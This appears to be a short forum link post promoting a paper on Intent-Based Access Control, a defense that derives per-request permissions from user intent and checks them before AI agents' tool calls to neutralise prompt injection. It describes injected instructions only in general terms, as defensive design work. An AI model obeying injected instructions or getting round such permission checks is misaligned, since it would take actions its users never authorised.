❌

Reading view

Intent-Based Access Control (IBAC) – FGA for AI Agent Permissions

Every production defense against prompt injectionβ€”input filters, LLM-as-a-judge, output classifiersβ€”tries to make the AI smarter about detecting attacks. Intent-Based Access Control (IBAC) makes attacks irrelevant. IBAC derives per-request permissions from the user's explicit intent, enforces them deterministically at every tool invocation, and blocks unauthorized actions regardless of how thoroughly injected instructions compromise the LLM's reasoning.

The implementation is two steps: parse the user's intent into FGA tuples (email:send#bob@company.com), then check those tuples before every tool call. One extra LLM call. One ~9ms authorization check. No custom interpreter, no dual-LLM architecture, no changes to your agent framework.

https://ibac.dev/ibac-paper.pdf

submitted by /u/ok_bye_now_
[link] [comments]
  •  
❌